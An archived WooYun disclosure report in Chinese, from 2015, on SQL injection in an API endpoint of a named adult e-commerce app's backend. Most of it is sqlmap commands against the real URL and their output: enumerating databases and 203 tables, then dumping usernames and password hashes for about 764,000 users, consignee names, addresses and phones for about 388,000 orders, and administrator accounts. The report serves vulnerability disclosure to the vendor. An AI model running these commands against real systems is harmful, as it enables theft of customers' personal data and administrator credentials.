乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-09: 细节已通知厂商并且等待厂商处理中 2015-06-12: 厂商已经确认,细节仅向厂商公开 2015-06-22: 细节向核心白帽子及相关领域专家公开 2015-07-02: 细节向普通白帽子公开 2015-07-12: 细节向实习白帽子公开 2015-07-27: 细节向公众公开
成人电商啊,订单满天飞
APP客户端上的一个漏洞,话说哥们是搜Nice客户端,被推荐安装的这个APP,真心不是刚需安装啊。。。结果发现这个洞,解释多了都是泪啊,直接上poc数据库
python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" --dbs
[00:15:46] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[00:15:46] [INFO] fetching database names[00:15:46] [INFO] the SQL query used returns 6 entries[00:15:46] [INFO] resumed: information_schema[00:15:46] [INFO] resumed: easy_taodata[00:15:46] [INFO] resumed: jp_taodata[00:15:46] [INFO] resumed: oto[00:15:46] [INFO] resumed: taodata[00:15:46] [INFO] resumed: zhidao_taohwuavailable databases [6]:[*] easy_taodata[*] information_schema[*] jp_taodata[*] oto[*] taodata[*] zhidao_taohwu
200多张表
python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata --tables
Database: taodata[203 tables]+------------------------------+| ecs_category_2014-04-25 || ecs_goods_2014-04-25 || ecs_goods_gallery_2014-04-25 || app_activity_goods || app_activity_time || app_android_category || app_article || app_article_category || app_article_label || app_article_reply || app_bar || app_bar_at || app_bar_blackfans || app_bar_category || app_bar_checkin || app_bar_collect || app_bar_comment || app_bar_comment20150107 || app_bar_fans || app_bar_img || app_bar_letter || app_bar_points_log || app_bar_power || app_bar_praise || app_channel || app_cpa_report || app_field_category || app_index_issue || app_index_issue_category || app_ios_category || app_open_apply || app_open_apply20140926 || app_recommend_download || app_show_accuse || app_show_collect || app_show_comment || app_show_field || app_show_img || app_show_praise || app_topic || app_user_idea || aws_answer || aws_question || drp_goods_attr || drp_goods_gallery || ecs_account_log || ecs_ad || ecs_ad_custom || ecs_ad_keywords || ecs_ad_keywords_click || ecs_ad_position || ecs_admin_action || ecs_admin_log || ecs_admin_message || ecs_admin_user || ecs_adsense || ecs_adv || ecs_adv_pic || ecs_affiliate_log || ecs_agency || ecs_app_goods || ecs_area_region || ecs_article || ecs_article_attr || ecs_article_cat || ecs_attribute || ecs_auction_log || ecs_auto_manage || ecs_back_goods || ecs_back_order || ecs_bonus_type || ecs_booking_goods || ecs_brand || ecs_card || ecs_cart || ecs_cat_filtrate_brand || ecs_cat_filtrate_price || ecs_cat_recommend || ecs_category || ecs_collect_goods || ecs_comment || ecs_comment_reply || ecs_coupon || ecs_coupon_log || ecs_crons || ecs_delivery_goods || ecs_delivery_order || ecs_email_list || ecs_email_sendlist || ecs_error_log || ecs_exchange_goods || ecs_express_log || ecs_favourable_activity || ecs_feedback || ecs_friend_link || ecs_goods || ecs_goods_activity || ecs_goods_adv_pic || ecs_goods_article || ecs_goods_attr || ecs_goods_cat || ecs_goods_copy || ecs_goods_gallery || ecs_goods_insale || ecs_goods_ios || ecs_goods_sales || ecs_goods_stock || ecs_goods_third || ecs_goods_third_meal || ecs_goods_type || ecs_group_goods || ecs_group_up || ecs_jiajiagou || ecs_keywords || ecs_lasting_ticket || ecs_link_goods || ecs_mail_send_log || ecs_mail_templates || ecs_member_price || ecs_message || ecs_mobile_adv_pic || ecs_nav || ecs_new2_page_issue || ecs_new_page_issue || ecs_order_360info || ecs_order_action || ecs_order_goods || ecs_order_info || ecs_order_info20150104 || ecs_order_info_extend || ecs_order_yhj || ecs_orderlog || ecs_outbound_goods || ecs_pack || ecs_package_goods || ecs_page_issue || ecs_pay_log || ecs_payment || ecs_plugins || ecs_postmoney_rule || ecs_promotion_cfg || ecs_qianggou || ecs_reg_extend_info || ecs_reg_fields || ecs_region || ecs_role || ecs_role_user || ecs_searchengine || ecs_sessions || ecs_sessions_data || ecs_sex_test || ecs_sex_test_log || ecs_shipping || ecs_shipping_area || ecs_shop_config || ecs_sms || ecs_snatch_log || ecs_stats || ecs_storage_goods || ecs_subscibe || ecs_suppliers || ecs_tag || ecs_tag_cat || ecs_tag_cat_relation || ecs_tag_relation || ecs_taocan || ecs_template || ecs_topic || ecs_topic_issue || ecs_user_account || ecs_user_address || ecs_user_bonus || ecs_user_direct_price || ecs_user_feed || ecs_user_gift_coupon || ecs_user_login_log || ecs_user_rank || ecs_users || ecs_virtual_card || ecs_volume_price || ecs_vote || ecs_vote_log || ecs_vote_option || ecs_wap_category || ecs_wholesale || erp_action_log || erp_admin || erp_permission || erp_project || erp_purchase || erp_purchase_detail || getbonus_log || ltb_session || stats_click || stats_goods || stats_order || stats_pv || stats_search_keys || stats_user_order || temp_Stat || temp_order || user_info || user_login_log |+------------------------------+
76万用户手机和密码等信息
python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_users -C user_name,password,user_id --dump --charset=UTF-8
[00:43:28] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[00:43:28] [INFO] fetching columns 'password, user_id, user_name' for table 'ecs_users' in database 'taodata'[00:43:28] [INFO] the SQL query used returns 3 entries[00:43:28] [INFO] resumed: user_id[00:43:28] [INFO] resumed: mediumint(8) unsigned[00:43:28] [INFO] resumed: user_name[00:43:28] [INFO] resumed: varchar(150)[00:43:28] [INFO] resumed: password[00:43:28] [INFO] resumed: varchar(32)[00:43:28] [INFO] fetching entries of column(s) 'password, user_id, user_name' for table 'ecs_users' in database 'taodata'[00:43:28] [INFO] the SQL query used returns 764045 entries
38万订单数据
python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_order_info --dump -C consignee,address,mobile,user_id --charset=UTF-8
[00:45:24] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[00:45:24] [INFO] fetching columns for table 'ecs_order_info' in database 'taodata'[00:45:24] [INFO] the SQL query used returns 101 entries[00:45:24] [INFO] fetching entries for table 'ecs_order_info' in database 'taodata'[00:45:24] [INFO] the SQL query used returns 388531 entries
管理员数据
python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_admin_user --dump --charset=UTF-8
[00:49:00] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[00:49:00] [INFO] fetching columns for table 'ecs_admin_user' in database 'taodata'[00:49:00] [INFO] the SQL query used returns 14 entries[00:49:00] [INFO] resumed: user_id[00:49:00] [INFO] resumed: smallint(5) unsigned[00:49:00] [INFO] resumed: user_name[00:49:00] [INFO] resumed: varchar(255)[00:49:00] [INFO] resumed: email[00:49:00] [INFO] resumed: varchar(255)[00:49:00] [INFO] resumed: password[00:49:00] [INFO] resumed: varchar(32)[00:49:00] [INFO] resumed: add_time[00:49:00] [INFO] resumed: int(11)[00:49:00] [INFO] resumed: last_login[00:49:00] [INFO] resumed: int(11)[00:49:00] [INFO] resumed: last_ip[00:49:00] [INFO] resumed: varchar(15)[00:49:00] [INFO] resumed: action_list[00:49:00] [INFO] resumed: text[00:49:00] [INFO] resumed: nav_list[00:49:00] [INFO] resumed: text[00:49:00] [INFO] resumed: lang_type[00:49:00] [INFO] resumed: varchar(50)[00:49:00] [INFO] resumed: agency_id[00:49:00] [INFO] resumed: smallint(5) unsigned[00:49:00] [INFO] resumed: suppliers_id[00:49:00] [INFO] resumed: smallint(5) unsigned[00:49:00] [INFO] resumed: todolist[00:49:00] [INFO] resumed: longtext[00:49:00] [INFO] resumed: is_kf[00:49:00] [INFO] resumed: tinyint(1)[00:49:00] [INFO] fetching entries for table 'ecs_admin_user' in database 'taodata'[00:49:00] [INFO] the SQL query used returns 15 entries
用户信息
订单信息
管理员信息
看着改吧
危害等级:中
漏洞Rank:8
确认时间:2015-06-12 13:47
CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无
